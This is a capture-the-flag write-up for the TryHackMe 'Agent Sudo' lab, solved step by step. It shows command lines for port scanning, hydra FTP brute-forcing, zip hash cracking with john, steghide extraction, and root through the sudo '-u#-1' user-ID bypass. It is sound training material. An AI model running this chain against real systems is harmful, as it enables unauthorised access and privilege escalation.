TryHackMe : Agent Sudo

[Task 2] Enumerate

  1. How many open ports?

Port Scan

nmap -Pn <ip>

High port scan

nmap -Pn -p1000-65535 <ip>

No more ports

Service and OS scan

nmap -A -p 21,22,80 <ip>

Vulnerability scan

nmap --script vuln -p 21,22,80 <ip>

Not much useful

2. How you redirect yourself to a secret page?

Access HTTP site

Viewing source shows nothing.

Using the user-agent hint, I think I have to change the User-Agent of the request.

Intercept with Burp Suite

Change to “R”

Nothing useful

Let’s try from A-Z. I succeeded with “C”.

New hidden page

Seems like C is chris.

3. What is the agent name?
ANS: It’s in #2.

[Task 3] Hash cracking and brute-force

  1. FTP password

Let’s brute-force FTP

Create user list

echo chris > users.txt
echo C >> users.txt
echo c >> users.txt
cat users.txt

Brute-force with hydra

hydra -L users.txt -P rockyou.txt ftp://<ip> -u -F -V

I got the credential “chris:crystal”

Try to login.

ftp <ip>
chris
crystal

Success!!!

ls

Download all files

get To_agentJ.txt
get cute-alien.jpg
get cutie.png
cat To_agentJ.txt

Seems like I have to do something with the images.

Check with file explorer if it’s a real image.

Get file metadata.

exiftool cute-alien.jpg

Nothing much

View file’s hexcode.

bless cute-alien.jpg

Nothing much.

Try to extract text.

steghide extract -sf cute-alien.jpg

I don’t have any passphrase.

Let’s switch to another file.

Get file metadata.

exiftool cutie.png

Nothing much

View file’s hexcode.

bless cutie.png

There’s a hidden file.

Extract it

foremost cutie.png

I get the zip file as a result. But the file is locked with a password.

Crack it with fcrackzip

fcrackzip -u -v -D -p rockyou.txt 00000067.zip

I failed using fcrackzip.

Crack with john.

zip2john 00000067.zip > zip.hash
john zip.hash
john zip.hash --show

“alien”

3. steg password

Unzip the file.

Now I have a text with keyword “QXJlYTUx”

Extract cute-alien.jpg with passphrase “QXJlYTUx”

steghide extract -sf cute-alien.jpg

Failed!!! This “QXJlYTUx” may be encoded.

Decode from Base64 with CyberChef. “Area51”

Extract cute-alien.jpg with passphrase “Area51”

steghide extract -sf cute-alien.jpg

I have message.txt

4. Who is the other agent (in full name)?

cat message.txt

Now I have SSH credential, “james:hackerrules!”

5. SSH password
ANS: It’s in #3.

[Task 4] Capture the user flag

  1. What is the user flag?

Login with SSH

ssh james@<ip>
ls
cat user_flag.txt

2. What is the incident of the photo called?

Download the file

scp james@10.10.205.123:/home/james/Alien_autospy.jpg .
exiftool Alien_autospy.jpg

Nothing much

Let’s search with Google

Using the hint

roswell new mexico alien foxnews

Since I can’t find the exact word, I have to guess the answer.

ANS: Roswell ***** autopsy

[Task 5] Privilege escalation

  1. CVE number for the escalation (Format: CVE-xxxx-xxxx)

Search for vulnerabilities

Verify kernel

uname -a

Not much useful

sudo -l

I can do something with /bin/bash

sudo bash

Failed!!!

Let’s google “(ALL, !root) /bin/bash”.

2. What is the root flag?

Let’s exploit it

sudo -u#-1 /bin/bash

Now I’m root.

cd /root
ls
cat root.txt

3. (Bonus) Who is Agent R?
ANS: It’s in #2